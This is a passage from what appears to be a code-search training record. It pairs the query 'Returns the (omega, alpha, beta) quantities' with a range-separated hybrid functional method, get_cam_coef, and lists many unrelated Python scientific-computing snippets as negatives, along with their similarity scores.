ground_state[\"cf\"][key]\n energy.append(len(ground_state[\"atoms\"]) * gs_energy)\n return energy", "def get_num_countries(self):\n return len(self.countries)", "def getSize(self):\n if self.sym != None:\n return self.sym.getSize()\n return self.define.getSize()", "def _get_count(self, msg, subtype=\"all\"):\n try:\n counts = self.get_local(msg, \"counts\")\n return counts.get(subtype, 0)\n except KeyError:\n return 0", "def _get_lymphocytes_to_exchange(self):\n self.lock_to_exchange.acquire()\n lymphocytes = self.to_exchange[:]\n self.lock_to_exchange.release()\n return lymphocytes", "def load(self):\n total = sum(self.connections.values())\n return total", "def get_TotalCount(self):\n return self._output.get('TotalCount', None)", "def num_attendees(self):\r\n n = sum([c.qty for c in self.contribution_set.all()])\r\n return n", "def bill_to_global_ultimate(self):\n return self._bill_to_global_ultimate", "def count(self) -> float:\n return pulumi.get(self, \"count\")", "def get_total_stateless(db):\n pass", "def get_usage(self):\n res = self.conn.get_send_quota()\n res = res['GetSendQuotaResponse']\n result = res['GetSendQuotaResult']\n quota = float(result['Max24HourSend'])\n sent = float(result['SentLast24Hours'])\n return sent, quota", "def Available(self) -> int:", "def Available(self) -> int:", "def Available(self) -> int:" ]
[ "0.6179084", "0.57443017", "0.5690381", "0.54959685", "0.5471419", "0.5430132", "0.54086834", "0.5376728", "0.53472584", "0.532548", "0.52933073", "0.5260959", "0.52479035", "0.52417845", "0.5236068", "0.52341425", "0.52264065", "0.5225553", "0.5212044", "0.5207183", "0.5192774", "0.518821", "0.518764", "0.51840156", "0.51670605", "0.5164562", "0.51516145", "0.5148122", "0.51471496", "0.5143264", "0.5139769", "0.5132549", "0.5129987", "0.5125984", "0.5110891", "0.51014894", "0.51001084", "0.50905025", "0.508993", "0.5087617", "0.5083241", "0.5073377", "0.5072414", "0.50688523", "0.50685656", "0.5067115", "0.50627816", "0.5058083", "0.5048163", "0.5038236", "0.5030739", "0.50266826", "0.50214565", "0.50207716", "0.5014149", "0.5005501", "0.5005277", "0.49967915", "0.49957305", "0.49895945", "0.49842456", "0.49832517", "0.49770746", "0.4972596", "0.49688807", "0.49623066", "0.49573606", "0.49551457", "0.49529678", "0.49522686", "0.49510276", "0.49431205", "0.4935329", "0.49282494", "0.49162376", "0.49128398", "0.49118268", "0.49101573", "0.4907047", "0.49057028", "0.48975876", "0.48975876", "0.48975876", "0.48975876", "0.48975876", "0.48975876", "0.4895614", "0.48921847", "0.48895893", "0.48833525", "0.48822415", "0.4881435", "0.48806214", "0.48798096", "0.4879462", "0.4876635", "0.48744243", "0.48734692", "0.48703638", "0.48703638", "0.48703638" ]
0.0
-1
Returns the (omega, alpha, beta) quantities
def get_cam_coef(self): if self._family not in [flags.XC_FAMILY_HYB_LDA, flags.XC_FAMILY_HYB_GGA, flags.XC_FAMILY_HYB_MGGA]: raise ValueError("get_cam_coef can only be called on hybrid functionals.") if not self._have_cam: raise ValueError("get_cam_coef can only be called on range-separated functionals.") return (self._cam_omega, self._cam_alpha, self._cam_beta)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def quantities():\n # publish the modules\n return (\n SI,\n angle, area, energy, force, length, mass, power, pressure,\n speed, substance, temperature, time, volume\n )", "def omega(self):\n return self._omega", "def getParam(self):\n return self.__alpha0, self.__alpha1, self.__beta, self.__eta", "def getBoxBetaAndDimensions(self):\n beta=float(self._raw_data[\"BOX_DIMENSIONS\"][0])\n x=float(self._raw_data[\"BOX_DIMENSIONS\"][1])\n y=float(self._raw_data[\"BOX_DIMENSIONS\"][2])\n z=float(self._raw_data[\"BOX_DIMENSIONS\"][3])\n return (units.Quantity(beta, units.degree),\n units.Quantity(x, units.angstrom),\n units.Quantity(y, units.angstrom),\n units.Quantity(z, units.angstrom))", "def get_omega(num_sys=1):\n return 2.0*np.pi*uniform(size = num_sys)", "def omega ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import DaVinci__N3BodyDecays \n ##\n pre_omega = self.make_selection (\n ## the unique tag \n 'PreOmega' ,\n ## algorithm type to be used\n DaVinci__N3BodyDecays ,\n ## input selections \n [ self.pions () , self.pi0 () ] ,\n ##\n DecayDescriptor = \" omega(782) -> pi+ pi- pi0\" ,\n ## \n Combination12Cut = \"\"\" ( AM < 1 * GeV ) &\n ( ACHI2DOCA(1,2) < 12 ) \n \"\"\" ,\n ## \n CombinationCut = \"\"\"\n ( APT > %s ) & ( ADAMASS ( 'omega(782)' ) < 100 * MeV )\n \"\"\" % ( 0.9 * self['OMEGA_PT'] ),\n ##\n MotherCut = \"\"\"\n ( PT > %s ) &\n ( chi2vx < 9 )\n \"\"\" % self['OMEGA_PT']\n )\n \n from GaudiConfUtils.ConfigurableGenerators import Pi0Veto__Tagger2g\n ## \n return self.make_selection (\n 'Omega' ,\n Pi0Veto__Tagger2g ,\n [ pre_omega ] ,\n MassWindow = 25 * MeV ,\n MassChi2 = -1 ,\n ExtraInfoIndex = 25019 ## unique ! \n )", "def calculateGammaFactors(self):\n return (self.time/self.expectedDuration)**self.beta", "def Q_term(\n omega1, # vorticity-1 component\n omega2, # vorticity-2 component\n omega3, # vorticity-3 component\n s11, # strain rate-11 component\n s12, # strain rate-12 component\n s13, # strain rate-13 component\n s22, # strain rate-22 component\n s23, # strain rate-23 component\n s33): # strain rate-33 component\n #---------------------------------------------------------------------#\n # Numerator and denominator #\n #---------------------------------------------------------------------#\n num = omega1*s11*omega1 + omega1*s12*omega2 + omega1*s13*omega3 +\\\n omega2*s12*omega1 + omega2*s22*omega2 + omega2*s23*omega3+\\\n omega3*s13*omega1 + omega3*s23*omega2 + omega3*s33*omega3\n den1 = omega1*omega1 + omega2*omega2 + omega3*omega3\n den2 = (s11*s11 + s12*s12 + s13*s13 + s12*s12 + s22*s22 + s23*s23 +\\\n s13*s13 + s23*s23 + s33*s33)**0.5\n den = ((2.0/3.0)**0.5)* den1 * den2\n #---------------------------------------------------------------------#\n # Q calculation #\n #---------------------------------------------------------------------#\n Q = num/den\n\n return Q", "def beta(self):\n eTheta = self.eTheta()\n cosOmg = np.cos(self.omega())\n return self.a1()/c.c*(1-eTheta**2)**0.5*cosOmg", "def estimate(self, x, want_alpha=False, **args):\n N = len(x)\n # \\hat{alpha}: p(z_n | x_1, ..., x_n)\n alpha = np.zeros([N, self._K], float)\n alpha[0] = self._i * self._e[x[0]]\n alpha[0] /= alpha[0].sum()\n beta = np.zeros([N, self._K], float)\n beta[-1] = 1.0\n c = np.zeros([N], float)\n c[0] = alpha[0].sum()\n # Calculate Alpha\n for n in range(1, N):\n a = self._e[x[n]] * np.dot(alpha[n -1], self._t)\n c[n] = a.sum()\n alpha[n] = a / c[n]\n if want_alpha:\n return alpha, c\n # Calculate Beta\n for n in range(N - 2, -1, -1):\n beta[n] = np.dot(beta[n + 1] * self._e[x[n + 1]], self._t.T) / c[n + 1]\n gamma = alpha * beta\n xisum = sum(\n np.outer(alpha[n-1], self._e[x[n]] * beta[n]) / c[n] for n in range(1, N)\n ) * self._t\n return gamma, xisum, c", "def omega(self):\n return self._data.train_X @ self._thetas", "def big_analysis(beta0s=[0.5, 0.8, 1.1, 1.4, 1.7], ks=range(6), betaps=[1.2, 1.5, 2, 3]):", "def stats(self):\n nqbits = self.operator.num_qubits", "def nbetas(self):\n return sum(self.beta)", "def get_alpha_beta(self,n=50):\n return self.tau(self.f0(self.rho),n),self.tau_plus(self.f1(self.rho),n)", "def omega(self):\n self.cosineSequences()", "def omega(self):\n return [coset for coset in range(len(self.p)) if self.p[coset] == coset]", "def num_particles(self) -> Tuple[int, int]:\n return (self.num_alpha, self.num_beta)", "def get_omega(\n inequalities: List[Relational], n_bits: int, p: int = 10, as_numeric: bool = False\n) -> Matrix:\n n_vars = len(DEPENDENTS) + len(inequalities)\n q = qe.get_bit_map(n_vars=n_vars, n_bits=n_bits)\n a, b = qe.constraints_to_matrix(\n inequalities, dependents=DEPENDENTS, as_numeric=as_numeric\n )\n omega = -p * qe.get_constrained_matrix(q, a, b, as_numeric=as_numeric)\n nx = len(DEPENDENTS) * n_bits\n omega[:nx, :nx] += get_omega_0(n_bits, as_numeric=as_numeric)\n return omega", "def B(alpha, beta):\n return math.gamma(alpha) * math.gamma(beta) / math.gamma(alpha + beta)", "def B(alpha, beta):\n return math.gamma(alpha) * math.gamma(beta) / math.gamma(alpha + beta)", "def B(alpha, beta):\n return math.gamma(alpha) * math.gamma(beta) / math.gamma(alpha + beta)", "def B(alpha: float, beta: float) -> float:\n return math.gamma(alpha) * math.gamma(beta) / math.gamma(alpha + beta)", "def _get_alpha_beta(self):\n alpha = tf.nn.softplus(self.alpha_prime)\n beta = -alpha + tf.nn.softplus(self.beta_prime)\n return alpha, beta", "def quantum_theta(self):\n return quantum_theta(self.T_e, self.n_e)", "def getETA():", "def getETA():", "def test_calculate_basic_property_terms():\n X = 100\n delta_beta = 1.0\n rho = np.ones(X)\n g = np.ones(X)\n g_plus = np.ones(X) + 1\n g_minus = np.ones(X)\n\n ret = st.calculate_basic_property_terms(delta_beta, rho, g, g_plus, g_minus)\n\n assert np.all(ret[0] == g / rho)\n assert np.all(ret[1] == 0.5)\n assert np.all(ret[2] == 1.0)\n return", "def orderparameter(x, Tc=100, beta=0.5, amp=1):\n # op = amp*np.real(np.power(np.complex(Tc-x),beta))\n op = amp * np.power(Tc - x, beta)\n op[np.isnan(op)] = 0.0\n return op", "def zeta(self):\r\n raise NotImplementedError('not implemented yet')", "def gen_omega(costheta0, phi0, costheta1, phi1):\n global pgamma\n pgamma = [TLorentzVector(), TLorentzVector(), TLorentzVector()]\n q_omega = (m_omega**2 - m_pi0**2) / (2 * m_omega)\n sintheta1 = sqrt(1 - costheta1*costheta1)\n pgamma[0].SetXYZT(q_omega * sintheta1 * math.cos(phi1),\n q_omega * sintheta1 * math.sin(phi1),\n q_omega * costheta1, q_omega)\n q_pi0 = m_pi0 / 2\n sintheta0 = sqrt(1 - costheta0**2)\n pgamma[1].SetXYZT(q_pi0 * sintheta0 * math.cos(phi0),\n q_pi0 * sintheta0 * math.sin(phi0),\n q_pi0 * costheta0, q_pi0)\n pgamma[2].SetXYZT(-q_pi0 * sintheta0 * math.cos(phi0),\n -q_pi0 * sintheta0 * math.sin(phi0),\n -q_pi0 * costheta0, q_pi0)\n beta = pgamma[0].Vect() * (1 / math.sqrt(q_omega**2 + m_pi0**2))\n pgamma[1].Boost(-beta)\n pgamma[2].Boost(-beta)\n global pomega\n pomega = pgamma[0] + pgamma[1] + pgamma[2]\n return pomega", "def ex1_get(alpha,beta,pace,delta):\n\t\n\tfilename = seed+\"/ex_sim_a\"+str(alpha)+\"_p\"+str(pace)+\"_d\"+str(delta)+\".tmp\"\n\t\t\n\t# get the avg_energy vector\n\tavg_energy = [0]*(T+1)\n\tfile = open(filename,'r')\n\tfor _ in range(K):\n\t\tfile.readline() # the first line contains T\n\t\tfor t in range(T+1):\n\t\t\te_t = float(file.readline().split()[0]) # e_t is the 1st value\n\t\t\tavg_energy[t] += e_t/K\n\n\treturn avg_energy", "def B(alpha, beta):\n return math.gamma(apha) * math.gamma(beta) / math.gamma(alpha + beta)", "def curve_to_q(beta,mode='O'):\n n, T = beta.shape\n v = gradient(beta, 1. / (T - 1))\n v = v[1]\n\n q = zeros((n, T))\n lenb = sqrt(innerprod_q2(v,v))\n for i in range(0, T):\n L = sqrt(norm(v[:, i]))\n if L > 0.0001:\n q[:, i] = v[:, i] / L\n else:\n q[:, i] = v[:, i] * 0.0001\n\n lenq = sqrt(innerprod_q2(q,q))\n q = q / lenq\n \n if mode == 'C':\n q = project_curve(q)\n\n return (q, lenb, lenq)", "def nbeta(self) -> int:\n return self._core.nbeta()", "def omega_cyclotron(q, B, mass):\n return q * cgs.e * B / (mass * cgs.c)", "def M_ver(seq):\r\n num_AB = 0\r\n num_AnotB = 0\r\n num_BnotA = 0\r\n for item in seq:\r\n if np.array_equal(item, Quantifier.AB):\r\n num_AB += 1\r\n if np.array_equal(item, Quantifier.AnotB):\r\n num_AnotB += 1\r\n if np.array_equal(item, Quantifier.BnotA):\r\n num_BnotA += 1\r\n return (Quantifier.T if num_AB + num_AnotB > num_AB + num_BnotA\r\n else Quantifier.F)", "def get_etaZ(self, J, beta=0.0):\n # mu_0 hbar / 4_pi = hbar* 10^-7\n fact = -1.0545718e-41*self.gH.gamma*self.gX.gamma**2.0*(self.rXH*self.dist_fact)**-3.0 * self.B_0*self.gX.csa* 0.4\n return fact*(1.5*cos(beta)-0.5)*J[iOmX]", "def ex_sim_get(alpha,beta,pace,delta): \n\t\n\tfilename = seed+\"/ex_sim_a\"+str(alpha)+\"_p\"+str(pace)+\"_d\"+str(delta)+\".tmp\"\n\t\n\t# get the avg_energy and avg_overlap\n\tavg_energy = 0\n\tavg_overlap = 0\n\t\n\tfile = open(filename,'r')\n\tfor _ in range(K):\n\t\tdata = file.readline().split()\n\t\te_T,q_T = float(data[0]),float(data[1])\n\t\tavg_energy += e_T/K\n\t\tavg_overlap += q_T/K\n\t\n\treturn avg_energy, avg_overlap", "def Omega(z, x, beta2):\n \n nu0 = nu(x, beta2)\n zeta0 = zeta(z, x, beta2)\n \n temp = (eta(z, x, beta2)**2/16\n - zeta0 * nu0/6\n + nu0**3/216)\n return temp + sqrt(temp**2 - (zeta0/3 + nu0**2/36)**3)", "def tvalues(self):\n return self.params / self.bse", "def tvalues(self):\n return self.params / self.bse", "def generate_omega_data(*args):\n if len(args) == 2:\n return generate_omega(args[0], args[1])\n else:\n return generate_biased_omega(args[0], args[1], args[2])", "def _momentum_unit(eq):\n mp=1.66e-27; A=2;\n q=1.602e-19; Z=1\n B = np.abs(eq.B0EXP)\n R = eq.R0EXP\n\n mom_unit= Z*q*B*R**2 #pphi=pphi[SI]*pphi_unit\n energy_unit = mp*A/(Z*Z*q*q*R**2*B**2) #E=E[J]*energy_unit\n mu_unit = mp*A/(Z*Z*q*q*R**2*B) #mu=mu[SI]*mu_unit\n return mom_unit, energy_unit, mu_unit", "def _quant(self, input):\n quant_input = self._input_quantizer(input)\n quant_weight = self._weight_quantizer(self.weight)\n\n return (quant_input, quant_weight)", "def _quant(self, input):\n quant_input = self._input_quantizer(input)\n quant_weight = self._weight_quantizer(self.weight)\n\n return (quant_input, quant_weight)", "def _get_parameters(n, j, domain, g, ncap):\n alphas, betas = rc.recurrenceCoefficients(n - 2, lb=domain[0], rb=domain[1],\n j=j, g=g, ncap=ncap)\n omegas = g * np.array(alphas)\n ts = g * np.sqrt(np.array(betas)[1::])\n c0 = np.sqrt(betas[0])\n return omegas, ts, c0", "def getEta(self):\n self.__eta = 3./8.*(1. - self.__alpha0 - self.__alpha1 - 2.*self.__beta)\n if self.__eta<0.: self.__eta=0. # erreur d'arrondi\n return self.__eta", "def lattice_parameters(self):\n return self.a, self.b, self.c, self.alpha, self.beta, self.gamma", "def t99(B, alpha):\n\n Q = 2*scc.pi*(1+alpha**2)/scc.physical_constants['electron gyromag. ratio'][0]\n return (((Q/B)**2)/(1-0.99**2))**0.5", "def Qps(self):\n return [elem['Qp'] for elem in self.__compartments]", "def omega_c(B, m=m_star, q=q_e):\n return q * B / m # in 1/s", "def getOmega(dels):\n N = dels.delta_d.shape[1]\n delta_t = dels.delta_t\n delta_d = dels.delta_d\n \n a_t = np.diff(delta_t)\n a_t = a_t[:,0:-1]\n \n a_d = np.diff(delta_t[:,::-1])\n a_d = a_d[:,::-1]\n a_d = a_d[:,1::]\n \n b_t = np.diff(delta_d)\n b_t = b_t[:,0:-1]\n \n b_d = np.diff(delta_d[:,::-1])\n b_d = b_d[:,::-1]\n b_d = b_d[:,1::] \n \n c_t = 0.25*(np.abs(a_t)+np.abs(b_t))*np.sign(a_t)*np.sign(b_t)*(np.sign(a_t)*np.sign(b_t)-1)\n c_d = 0.25*(np.abs(a_d)+np.abs(b_d))*np.sign(a_d)*np.sign(b_d)*(np.sign(a_d)*np.sign(b_d)-1)\n Omega = 1.0/(2*N)*(c_t.mean(axis=0) + c_d.mean(axis=0))\n\n return Omega", "def _determine_omega_vector(syslist, omega_in, omega_limits, omega_num,\n Hz=None, feature_periphery_decades=None):\n omega_range_given = True\n\n if omega_in is None:\n if omega_limits is None:\n omega_range_given = False\n # Select a default range if none is provided\n omega_out = _default_frequency_range(\n syslist, number_of_samples=omega_num, Hz=Hz,\n feature_periphery_decades=feature_periphery_decades)\n else:\n omega_limits = np.asarray(omega_limits)\n if len(omega_limits) != 2:\n raise ValueError(\"len(omega_limits) must be 2\")\n omega_out = np.logspace(np.log10(omega_limits[0]),\n np.log10(omega_limits[1]),\n num=omega_num, endpoint=True)\n else:\n omega_out = np.copy(omega_in)\n\n return omega_out, omega_range_given", "def _q_z(self):\n D = self.latt_par['D'].value\n lambda_r = self.latt_par['lambda_r'].value\n gamma = self.latt_par['gamma'].value\n return 2*np.pi*(self.h/D - self.k/lambda_r/np.tan(gamma))", "def betas_for_alpha_bar(num_diffusion_timesteps, alpha_bar, max_beta=0.999):\n betas = []\n for i in range(num_diffusion_timesteps):\n t1 = i / num_diffusion_timesteps\n t2 = (i + 1) / num_diffusion_timesteps\n betas.append(min(1 - alpha_bar(t2) / alpha_bar(t1), max_beta))\n return np.array(betas)", "def getMagnitudes(self):\n return self._bmag, self._vmag, self._jmag, self._hmag, self._kmag", "def biquad_coefficients(self):\n a = 10 ** (self.gain / 40)\n w0 = 2 * np.pi * self.fc / self._fs\n alpha = np.sin(w0) / (2 * self.q)\n\n a0 = (a + 1) - (a - 1) * np.cos(w0) + 2 * np.sqrt(a) * alpha\n a1 = -(2 * ((a - 1) - (a + 1) * np.cos(w0))) / a0\n a2 = -((a + 1) - (a - 1) * np.cos(w0) - 2 * np.sqrt(a) * alpha) / a0\n\n b0 = (a * ((a + 1) + (a - 1) * np.cos(w0) + 2 * np.sqrt(a) * alpha)) / a0\n b1 = (-2 * a * ((a - 1) + (a + 1) * np.cos(w0))) / a0\n b2 = (a * ((a + 1) + (a - 1) * np.cos(w0) - 2 * np.sqrt(a) * alpha)) / a0\n\n return 1.0, a1, a2, b0, b1, b2", "def comp_beta(m1=database['pi+'].mass, m2=database['K+'].mass, p=75):\r\n b1 = beta(p, m1)\r\n b2 = beta(p, m2)\r\n db = abs(b1 - b2)\r\n if np.log10(db) < -2:\r\n disp_db = db*10**(-round(np.log10(db)))\r\n text1 = 'dBeta = {0:.3f}e-0{1:.0f}, '.format(disp_db, -round(np.log10(db)))\r\n else:\r\n text1 = 'dBeta = {0:.3f}, '.format(db)\r\n t1_per_m = 1/(b1*c)\r\n t2_per_m = 1/(b2*c)\r\n if t1_per_m > t2_per_m:\r\n rt = 1 - (t2_per_m/t1_per_m)\r\n else:\r\n rt = 1 - (t1_per_m/t2_per_m)\r\n if np.log10(rt) < -2:\r\n disp_rt = rt*10**(-round(np.log10(rt)))\r\n text3 = ', rt = {0:.3f}e-0{1:.0f}'.format(disp_rt, -round(np.log10(rt)))\r\n else:\r\n text3 = ', rt = {0:.3f}'.format(rt)\r\n dt_per_m = abs(t1_per_m-t2_per_m)\r\n if np.log10(dt_per_m) >= -1:\r\n text2 = 'dt = {0:.3f} s'.format(dt_per_m)\r\n if np.log10(dt_per_m) < -1 and np.log10(dt_per_m) >= -4:\r\n text2 = 'dt = {0:.3f} ms'.format(dt_per_m*1e3)\r\n if np.log10(dt_per_m) < -4 and np.log10(dt_per_m) >= -7:\r\n text2 = 'dt = {0:.3f} microns'.format(dt_per_m*1e6)\r\n if np.log10(dt_per_m) < -7 and np.log10(dt_per_m) >= -10:\r\n text2 = 'dt = {0:.3f} ns'.format(dt_per_m*1e9)\r\n if np.log10(dt_per_m) < -10:\r\n text2 = 'dt = {0:.3f} ps'.format(dt_per_m*1e12)\r\n return text1+text2+text3", "def biquad_coefficients(self):\n a = 10 ** (self.gain / 40)\n w0 = 2 * np.pi * self.fc / self._fs\n alpha = np.sin(w0) / (2 * self.q)\n\n a0 = (a + 1) + (a - 1) * np.cos(w0) + 2 * np.sqrt(a) * alpha\n a1 = -(-2 * ((a - 1) + (a + 1) * np.cos(w0))) / a0\n a2 = -((a + 1) + (a - 1) * np.cos(w0) - 2 * np.sqrt(a) * alpha) / a0\n\n b0 = (a * ((a + 1) - (a - 1) * np.cos(w0) + 2 * np.sqrt(a) * alpha)) / a0\n b1 = (2 * a * ((a - 1) - (a + 1) * np.cos(w0))) / a0\n b2 = (a * ((a + 1) - (a - 1) * np.cos(w0) - 2 * np.sqrt(a) * alpha)) / a0\n\n return 1.0, a1, a2, b0, b1, b2", "def components(self):\n return self._proportional, self._integral, self._derivative", "def get_characteristic_vals(self):\n\n # Characteristic quantity of x\n x = scutils.qv2x(self.dyn_sys.tpwl_dict['q'], self.dyn_sys.tpwl_dict['v'])\n x_char = np.abs(x).max(axis=0)\n\n # Characteristic quantity of the dynamics f\n f = np.zeros(x.shape)\n for i in range(x.shape[0]):\n f[i, :], _, _ = self.get_continuous_dynamics(x[i, :], self.dyn_sys.tpwl_dict['u'][i, :])\n f_char = np.abs(f).max(axis=0)\n\n return x_char, f_char", "def biquad_coefficients(self):\n a = 10 ** (self.gain / 40)\n w0 = 2 * np.pi * self.fc / self._fs\n alpha = np.sin(w0) / (2 * self.q)\n\n a0 = 1 + alpha / a\n a1 = -(-2 * np.cos(w0)) / a0\n a2 = -(1 - alpha / a) / a0\n\n b0 = (1 + alpha * a) / a0\n b1 = (-2 * np.cos(w0)) / a0\n b2 = (1 - alpha * a) / a0\n\n return 1.0, a1, a2, b0, b1, b2", "def params(self):\n return [cq.Symbol('theta_0')]", "def num_beta(self) -> int:\n return self._num_beta", "def gamma_param_estimate(mu,sigma):\n k = (mu/sigma)**2\n theta = sigma**2/mu\n\n return k,theta", "def compute_t_params(mu, kappa, alpha, beta):\r\n mu_, sigma2_, dof_ = mu, beta*(kappa + 1)/(alpha*kappa), 2*alpha\r\n return mu_, sigma2_, dof_", "def VarianceOfAbsAcceleration(self):\n H = []\n for i in range(len(self.omega_range)):\n \"\"\"Calculation of the Transmission matrix H\"\"\"\n H.append(np.linalg.inv((-self.omega_range[i] ** 2 * self.M\n - 1j * self.omega_range[i] * self.C\n + self.K)))\n \"\"\"squared absolute of the transmission matrix H multiplied with the diagonal of the mass matrix M (M*I)\"\"\"\n FRFacc = [H[wincr].dot(np.diagonal(self.M)) * self.omega_range[wincr] ** 2 for wincr in\n range(len(self.spectrum))]\n Habs2 = [(np.abs(np.ones(len(vector), dtype=float) - vector) ** 2) for vector in FRFacc]\n PSDexc = self.spectrum\n \"\"\"Response of all DOFs as PSD\"\"\"\n RespPSD = [Habs2[wincr] * PSDexc[wincr] for wincr in range(len(self.spectrum))]\n AccPSD = [abs(RespPSD[wincr] + 0*PSDexc[wincr]) for wincr in range(len(self.spectrum))]\n \"\"\"The variance of the response can be obtained with the integral of the response PSD. \n integral(PSD_response)\"\"\"\n variance = (np.trapz(AccPSD, self.omega_range, axis=0))\n return variance", "def get_phi_chi_omega(self, angles):\n (phi) = angles[0]\n chi = np.deg2rad(self.chi)\n omega = 0\n return (phi, chi, omega)", "def betas_for_alpha_bar(num_diffusion_timesteps, max_beta=0.999):\n\n def alpha_bar(time_step):\n return math.cos((time_step + 0.008) / 1.008 * math.pi / 2) ** 2\n\n betas = []\n for i in range(num_diffusion_timesteps):\n t1 = i / num_diffusion_timesteps\n t2 = (i + 1) / num_diffusion_timesteps\n betas.append(min(1 - alpha_bar(t2) / alpha_bar(t1), max_beta))\n return torch.tensor(betas, dtype=torch.float32)", "def get_units(self):\r\n msg = struct.pack('>2B', 56, 14)\r\n response = self.query(msg)\r\n\r\n if response[1] == 2:\r\n units = 'A'\r\n to_nm_multiplier = 1 / 10\r\n elif response[1] == 1:\r\n units = 'nm'\r\n to_nm_multiplier = 1\r\n elif response[1] == 0:\r\n units = 'um'\r\n to_nm_multiplier = 1000\r\n else:\r\n raise ValueError('Units not recognised.')\r\n\r\n # Save results locally too for quick re-use\r\n self._current_units = units\r\n self._current_to_nm_multiplier = to_nm_multiplier\r\n\r\n return units, to_nm_multiplier", "def get_etaXY(self, J, beta=0.0):\n fact = -1.0545718e-41*self.gH.gamma*self.gX.gamma**2.0*(self.rXH*self.dist_fact)**-3.0 * self.B_0*self.gX.csa* 0.4\n return fact/6.0*(1.5*cos(beta)-0.5)*( 4.0*J[0] + 3.0*J[iOmX] )", "def get_alpha_beta_bounds(self,n=50):\n rho_temp = self.rho\n self.rho = self.rho_max\n beta = self.tau_plus(self.f1(self.rho_max),n)\n self.rho = self.rho_min\n alpha = self.tau(self.f0(self.rho_min),n)\n self.rho = rho_temp\n return alpha,beta", "def _beta(self):\n return _handle_ab(self.solution, self.use_const)[1]", "def jarque_bera(self,alpha=0.05):\n self._finalize()\n JB = self.vcount/6*(self.vskewness**2 + 1/4*((self.vkurtosis-3)**2))\n if chi2 is None:\n p = \"scipy missing\"\n else:\n p = 1 - chi2.cdf(JB,2)\n return JB,p", "def quantum_volume(self):\n\n qv_list = 2**np.array(self._depths)\n\n return qv_list", "def getGamma(self, alpha, beta):\n return np.power(beta,2.0)/2.0/alpha", "def gather_qpt_info_me(self):\n if not self.active_worker:\n return None\n\n nqpt_me = len(self.my_iqpts)\n\n qred = np.zeros((nqpt_me, 3), dtype=np.float)\n omega = np.zeros((nqpt_me, 3 * self.natom), dtype=np.float)\n\n for i, iqpt in enumerate(self.my_iqpts):\n\n self.set_ddb(iqpt)\n qred[i,:] = self.qptanalyzer.qred[:]\n omega[i,:] = np.real(self.qptanalyzer.omega[:])\n\n return qred, omega", "def calculate(beta: int, alpha: int) -> int: # pragma: no cover\n if beta == 0:\n raise ArithmeticError(\"Cannot compute the discrete logarithm of 0 in a Galois field.\")\n\n r = len(FACTORS)\n n = ORDER - 1 # Order of the multiplicative group of GF(p^m), must be prime\n\n x = np.zeros(r, dtype=DTYPE)\n m = np.zeros(r, dtype=DTYPE)\n for i in range(r):\n q = FACTORS[i]\n e = MULTIPLICITIES[i]\n m[i] = q**e\n gamma = 1\n alpha_bar = POWER(alpha, n // q)\n l_prev = 0 # Starts as l_i-1\n q_prev = 0 # Starts as q^(-1)\n for j in range(e):\n gamma = MULTIPLY(gamma, POWER(alpha, l_prev * q_prev))\n beta_bar = POWER(MULTIPLY(beta, RECIPROCAL(gamma)), n // (q ** (j + 1)))\n l = BRUTE_FORCE_LOG(beta_bar, alpha_bar)\n x[i] += l * q**j\n l_prev = l\n q_prev = q**j\n\n return CRT(x, m)", "def get_Omega(num_sys=1):\n return 2.0*np.pi*uniform(size = num_sys)", "def ex2_3_get(alpha,beta,pace,delta): \n\t\n\tfilename = seed+\"/ex2_a\"+str(alpha)+\"_b\"+str(beta)+\".tmp\"\n\t\n\t# get the avg_energy and avg_overlap\n\tavg_energy = 0\n\tavg_overlap = 0\n\t\n\tfile = open(filename,'r')\n\tfor _ in range(K):\n\t\tdata = file.readline().split()\n\t\te_T,q_T = float(data[0]),float(data[1])\n\t\tavg_energy += e_T/K\n\t\tavg_overlap += q_T/K\n\t\n\treturn avg_energy, avg_overlap", "def get_val_params(sigma, alpha):\n if len(sigma) == 2:\n sigma_val = [(sigma[0] + sigma[1]) / 2]\n elif len(sigma) == 1:\n sigma_val = sigma\n else:\n raise RuntimeError('Invalid sigma length = {}'.format(len(sigma)))\n\n if len(alpha) == 2:\n alpha_val = [(alpha[0] + alpha[1]) / 2]\n elif len(alpha) == 1:\n alpha_val = alpha\n else:\n raise RuntimeError('Invalid alpha length = {}'.format(len(alpha)))\n\n return sigma_val, alpha_val", "def _quantile_function(self, alpha=0.5, smallest_count=None):\n clean, total = self._prepare_for_stats()\n if not total:\n return lambda q: None\n\n smallest_observed_count = min(clean.values())\n if smallest_count is None:\n smallest_count = smallest_observed_count\n else:\n smallest_count = min(smallest_count, smallest_observed_count)\n\n beta = alpha * smallest_count\n\n debug_plot = []\n cumulative_sum = 0.0\n inverse = sortedcontainers.SortedDict()\n for value, count in clean.items():\n debug_plot.append((cumulative_sum / total, value))\n inverse[(cumulative_sum + beta) / total] = value\n cumulative_sum += count\n inverse[(cumulative_sum - beta) / total] = value\n debug_plot.append((cumulative_sum / total, value))\n\n # get maximum and minumum q values\n q_min = inverse.keys()[0]\n q_max = inverse.keys()[-1]\n\n # this stuff if helpful for debugging -- keep it in here\n # for i, j in debug_plot:\n # print i, j\n # print ''\n # for i, j in inverse.items():\n # print i, j\n # print ''\n\n def function(q):\n\n if q < 0.0 or q > 1.0:\n msg = \"invalid quantile {}, need `0 <= q <= 1`\".format(q)\n raise ValueError(msg)\n elif q < q_min:\n q = q_min\n elif q > q_max:\n q = q_max\n\n # if beta is\n if beta > 0:\n if q in inverse:\n result = inverse[q]\n else:\n previous_index = inverse.bisect_left(q) - 1\n x1 = inverse.keys()[previous_index]\n x2 = inverse.keys()[previous_index + 1]\n y1 = inverse[x1]\n y2 = inverse[x2]\n result = (y2 - y1) * (q - x1) / float(x2 - x1) + y1\n\n else:\n if q in inverse:\n previous_index = inverse.bisect_left(q) - 1\n x1 = inverse.keys()[previous_index]\n x2 = inverse.keys()[previous_index + 1]\n y1 = inverse[x1]\n y2 = inverse[x2]\n result = 0.5 * (y1 + y2)\n else:\n previous_index = inverse.bisect_left(q) - 1\n x1 = inverse.keys()[previous_index]\n result = inverse[x1]\n\n return float(result)\n\n return function", "def beta_star(self):\n return self.reciprocal_lattice_parameters[4]", "def param_quantizers(self):\n return self._param_quantizers", "def normalize_quantities(self):\n return (\n pynini.cdrewrite(self.units_map, \"\", \"\", self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.singularize_map, \"1 \", \"\", self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.thousands_map, \"\", self.triple_digits, self.sigma_star, direction=\"ltr\") *\n pynini.cdrewrite(self.hundreds_map, 